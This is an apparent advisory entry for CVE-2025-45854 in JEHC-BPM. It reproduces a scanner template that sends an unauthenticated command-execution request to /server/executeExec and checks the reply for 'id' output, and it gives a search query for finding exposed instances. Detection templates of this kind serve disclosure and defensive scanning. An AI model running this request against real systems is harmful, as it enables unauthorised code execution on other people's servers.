A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
PoC代码[已公开]
id: CVE-2025-45854
info:
name: JEHC-BPM - Remote Code Execute
author: ritikchaddha
severity: critical
description: |
A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
reference:
- https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
- https://nvd.nist.gov/vuln/detail/CVE-2025-45854
classification:
epss-score: 0.15797
epss-percentile: 0.94485
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2025-45854
cwe-id: CWE-862,CWE-434
metadata:
max-request: 1
product: jehc-bpm
fofa-query: body="JEHC"
tags: cve,cve2025,jehc-bpm,rce,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
words:
- "JEHC"
- "XSHI"
case-insensitive: true
internal: true
- raw:
- |
POST /server/executeExec HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{
"actuator": {
"clientIp": "127.0.0.1",
"port": 8082,
"applicationName": "testApp",
"env": "prod",
"uploadTime": 1704523200000,
"hasPrefixApplicationName": false,
"clientHttpPrefix": "http"
},
"execParams": {
"command": "id"
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+.*gid=[0-9]+.*"
- type: status
status:
- 200
# digest: 490a004630440220732c3d4b51952877c225c42b2ec2860e5cf2e00dccaa6581e65c96bcefad0cb60220328c4f3351d18e3393bfbdc4ead09c8ba49d61de62b2ebd2b3ebff9b23df1a00:922c64590222798bb761d5b6d8e72950